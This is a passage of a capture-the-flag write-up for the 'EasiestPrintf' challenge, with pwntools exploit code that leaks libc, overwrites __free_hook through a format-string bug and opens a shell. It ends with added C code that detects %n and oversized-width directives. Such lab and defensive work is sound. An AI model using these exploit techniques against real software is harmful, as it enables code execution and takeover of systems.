When the string it prints exceeds a certain size, printf calls malloc and free (inside vfprintf), so the format string bug (FSB) can be used to overwrite __malloc_hook or __free_hook.
Alternatively, a function pointer in stdout (_IO_2_1_stdout_) can be overwritten.
Because the binary is 32-bit:

```python
write = {_IO_2_1_stdout + 148: 0x0804A570 - 0x1c, 0x0804A570: system + 1}
payload = '/bin/sh;'
payload += fmtstr_payload(9, write, len(payload), 'byte')
```

Source: http://say2.tistory.com/262 [say2]
```python
p.sendlineafter('Bye', '/bin/sh;' + fmtstr_payload(9, {free_hook: system - 0x08080808}) + "%100000c")
```
```python
from pwn import *

p = process('./EasiestPrintf')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
binary = ELF('./EasiestPrintf')

# leak a libc address: the binary prints the GOT entry of open
open_got = 0x8049FE8
p.sendlineafter('read:\n', str(open_got))
libc = int(p.recv(10), 16) - 0xd5570
log.info("libc: " + hex(libc))

malloc_hook = libc + 0x1b2768
log.info("malloc_hook: " + hex(malloc_hook))
free_hook = libc + 0x1b38b0  # 0x1b3536
one_gadget = libc + 0x3ac69  # 0x5fbc5
system = libc + 0x3ada0
log.info("one_gadget" + hex(one_gadget))
log.info("system" + hex(system))
# 0x5fbc5 0x5fbc6
raw_input()

# FSB write to __free_hook; the trailing wide %c makes vfprintf take the
# large-string path that calls free()
p.sendlineafter('Bye', '/bin/sh;' + fmtstr_payload(9, {free_hook: one_gadget - 0x08080808}) + "%100000c")
p.interactive()
```
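As an added defensive example (not from this write-up or the challenge), a C check that classifies untrusted input before it is logged or echoed: it flags `%n` write directives and the oversized field widths that push vfprintf into its malloc/free path, and the wrapper shows the structural fix, passing the data as an argument rather than as the format string. The MAX_SANE_WIDTH threshold and the function names are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed threshold: a legitimate width is small; widths like "%100000c"
 * exist only to force the large-string (malloc/free) path in vfprintf. */
#define MAX_SANE_WIDTH 1024

enum { FMT_CLEAN = 0, FMT_DIRECTIVE = 1, FMT_WRITE = 2, FMT_HUGE_WIDTH = 4 };

/* Parse a decimal run, clamped so hostile input cannot overflow a long. */
static long read_number(const char **pp) {
    long n = 0;
    for (; isdigit((unsigned char)**pp); (*pp)++)
        if (n < 100000000L) n = n * 10 + (**pp - '0');
    return n;
}

/* Classify untrusted text. Returns a bitmask: FMT_DIRECTIVE for any
 * %-conversion, FMT_WRITE if a %n (memory write) directive is present,
 * FMT_HUGE_WIDTH if a field width exceeds MAX_SANE_WIDTH. */
int classify_format_input(const char *s) {
    int verdict = FMT_CLEAN;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (*++p == '%') continue;                 /* "%%" is a literal percent */
        verdict |= FMT_DIRECTIVE;
        while (*p && strchr("-+ #0", *p)) p++;     /* flags */
        long width = read_number(&p);              /* width, or "N$" position */
        if (*p == '$') {                           /* positional: real width follows */
            p++;
            while (*p && strchr("-+ #0", *p)) p++;
            width = read_number(&p);
        }
        if (width > MAX_SANE_WIDTH) verdict |= FMT_HUGE_WIDTH;
        if (*p == '.') { p++; read_number(&p); }   /* precision */
        while (*p && strchr("hlLqjzt", *p)) p++;   /* length modifiers */
        if (*p == 'n') verdict |= FMT_WRITE;
        if (!*p) break;                            /* string ended mid-directive */
    }
    return verdict;
}

/* The real fix is structural: user data is an argument, never the format
 * string. This wrapper logs the verdict and always prints safely. */
int print_untrusted(const char *s) {
    int v = classify_format_input(s);
    if (v & (FMT_WRITE | FMT_HUGE_WIDTH))
        fprintf(stderr, "[alert] suspicious format directives (mask %d)\n", v);
    printf("%s\n", s);                             /* never printf(s) */
    return v;
}
```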